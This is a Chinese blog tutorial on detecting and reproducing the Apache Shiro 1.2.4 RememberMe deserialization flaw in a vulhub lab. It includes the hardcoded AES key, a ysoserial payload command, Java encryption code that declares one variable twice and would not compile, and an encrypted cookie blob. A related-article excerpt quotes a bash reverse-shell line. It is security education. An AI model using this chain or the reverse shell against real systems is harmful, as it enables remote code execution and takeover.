Shiro1.2.4反序列化漏洞检测与复现

最新推荐文章于 2024-08-06 10:22:43 发布
最新推荐文章于 2024-08-06 10:22:43 发布
阅读量1.4k 收藏 21
点赞数 18
分类专栏: 网络安全 文章标签: 网络安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45396375/article/details/135116371
版权

shiro的remember me 为记住我功能,用户登录成功后,下次访问系统时无需重新登录 。当使用"记住我"功能登录后,shiro在浏览器的cookie中保存序列化后的认证数据。之后浏览器访问项目会携带该cookie数据,这样不登录也可以完成认证

1.漏洞检测

不勾选Remember Me,登录失败,会返回set-cookie RememberMe=deleteMe
在这里插入图片描述
不勾选Remember Me,登录成功,会返回set-cookie RememberMe=deleteMe
在这里插入图片描述
勾选Remember Me,登录失败,会返回set-cookie RememberMe=deleteMe
在这里插入图片描述
勾选Remember Me,登录成功,会返回set-cookie RememberMe=deleteMe和一个set-cookie RememberMe=base64加密后的cookie值
在这里插入图片描述
总结起来是,在shiro框架的登录页面进行登录就会返回set-cookie RememberMe=deleteMe,当勾选Remember Me,登录成功,会返回set-cookie RememberMe=deleteMe和一个set-cookie RememberMe=base64加密后的cookie值
符合这样特征的网站就是极有可能使用了shiro的框架,可能存在shiro反序列化漏洞

可以使用burp结合shiroscan插件来检测shiro框架,只要将shiroscan插件装到burp中,当登录shiro网站的时候就会在插件的地方显示出来网站的地址,shiroscan插件可以从github上下载,安装很简单https://github.com/Daybr4ak/ShiroScan
在这里插入图片描述

2.漏洞原理

用户勾选RememberMe登录后,shiro框架将用户信息进行序列化,序列化的内容进行AES加密,再使用base64编码,最后给用户返回一个rememberMe的cookie。
而AES加密采用了一个固定的key kPH+bIxk5D2deZiIxcaaaA==,因此攻击者可以构造恶意的代码,将恶意代码进行序列化,再通过固定key对恶意代码进行AES加密,再base64编码
攻击者将这段恶意数据替换为正常的cookie值,这段cookie值发到后台后,shiro框架会将这段加密数据进行base64解码,再AES解密,最后反序列化,这样恶意代码将会被执行。

3.漏洞复现

利用vulhub靶场进行漏洞复现
生成payload(可以使用ysoserial工具生成,github上下载很方便https://github.com/frohoff/ysoserial)

java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser

用shiro的固定key加密

import org.apache.shiro.codec.Base64;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.io.IOException;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class Test {
    public static void main(String[] args) throws IOException {
    //这里相对路径不成功可以写成绝对路径
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("..路径\\rmi", "to", "poc.ser"));
        Path filePath = Paths.get("..路径\\poc.ser");
        byte[] payloads = Files.readAllBytes(filePath);
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}



/*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
 */

修改remember me cookie
在这里插入图片描述
进入容器命令执行成功

在这里插入图片描述

яаеил
关注
  • 18
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) 复现
yukinorong的博客
06-29 3233
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
apache shiro 反序列化漏洞解决方案
yinchoushi8780的博客
12-18 2019
这个通过观察shiro1.2.4版本的源代码可以发现,如果不指定密钥,shiro会默认一个初始化密钥,该密钥是被硬编码在代码中,由于代码是开源的,攻击者很容易找到该密钥,并且伪造cookie发起攻击。通过观察最新版本1.7.1的源代码发现,如果不指定密钥shiro会初始化一个随机密钥,由于密钥是随机生成的,所以攻击者没办法猜测到密钥。注意 这是在使用shiro默认密钥的情况下,如果应用修改了默认密钥则需要保证该密钥不是公开的,并妥善保管防止泄露。反序列化:把字符串或者字节流恢复为对象的过程。
Shiro550 反序列化漏洞(CVE-2016-4437)
qq_68163788的博客
06-20 987
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
Apache Shiro 1.2.4反序列化漏洞复现
m0_59092234的博客
09-01 256
然后这个时候只要修改一个文件夹的名称PythonPython36Libsite-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C就ok了。Crypto.Cipher模块的错误,Google百度网上找了一大堆,疯狂pip安装卸载,都无法解决,后来采取了手动安装Crypto模块,最后终于解决。发现输入命令后最后出现了如下报错,其实一直都是出现了这个报错,之前只是没有理会。可以使用下面的语句安装pycryptodome这个库。在第一步的时候是安装过的,我们再安装试一次。...
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞
m0_56135391的博客
04-16 2957
使用docker -compose up -d拉取环境 本地访问8080端口进行验证,创建成功 使用shiro反序列化漏洞利用工具进行漏洞利用,输入目标网址,点击下一步 选择使用ceye.lo进行漏洞检测 当命令可输入的时候,证明含有该漏洞 在命令行中输入id,显示命令执行成功,但无回显 输入命令touch test创建一个文件 在网站目录下查看,该文件创建成功 打开虚拟机Kali系统,输入命令 nc -nvlp 6666监听6666端口 在shiro反序列化利用工具中选择简便操作,反
复现Apache Shiro 1.2.4反序列化漏洞
qq_63526413的博客
06-05 143
安装python2环境,并把shiro.exploit.py脚本和他调用的ysoserial.jar放入。复现Apache Shiro 1.2.4反序列化漏洞。安装pycrypto pycryptodome脚本。安装python2中插件。安装request脚本。
Shiro 1.2.4反序列化漏洞复现
帅醉了的博客
11-03 547
直接使用工具,成功找到 反弹shell 成功
Shiro 1.2.4反序列化漏洞
jxy158212的博客
02-24 737
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
weixin_60329395的博客
10-18 3639
1. 内容主要介绍shiro反序列化漏洞的原理和工具的利用。2. 要加深对漏洞的理解还是需要多研究一下自己编写需要的程序。
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
m0_61506558的博客
11-06 2552
关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
Shiro反序列化漏洞检测工具
01-05
Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
shiro反序列化漏洞检测工具,含链接教程
08-17
该压缩包文件包含的`shiro_tool.jar`很可能是一个专门用于检测Apache Shiro反序列化漏洞的工具。使用方法如描述所示,通过命令行输入`java -jar shiro_tool.jar`后跟目标服务器的URL,工具会尝试识别并测试该服务器...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8367
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 412
使用TCP协议支持与多个客户端同时通信。
C++ - 函数重载
最新发布
jiaowenjie的专栏
08-06 169
/打印的是第二个函数的地址。//打印的是第一个函数的地址。-> 重载函数在本质上是相互独立的不同函数。-> 函数返回值不能作为函数重载的依据。-> 重载函数的函数类型不同。**3.函数默认参数和函数重载****函数重载的注意事项:****4.函数重载的本质**
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行渗透。\[1\] 在服务端接收cookie值时,攻击者可以利用这个漏洞进行攻击。攻击者可以按照以下步骤来解析处理cookie值:首先检索RememberMe cookie的值,然后进行Base64解码,接着使用AES解密(加密密钥硬编码),最后进行反序列化操作。由于在调用反序列化时未进行任何过滤处理,攻击者可以触发远程代码执行漏洞。\[2\] 攻击者可以利用这个漏洞执行反弹shell语句,从而获取对目标系统的控制权。例如,可以使用以下命令来执行反弹shell语句:python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"。\[3\] #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值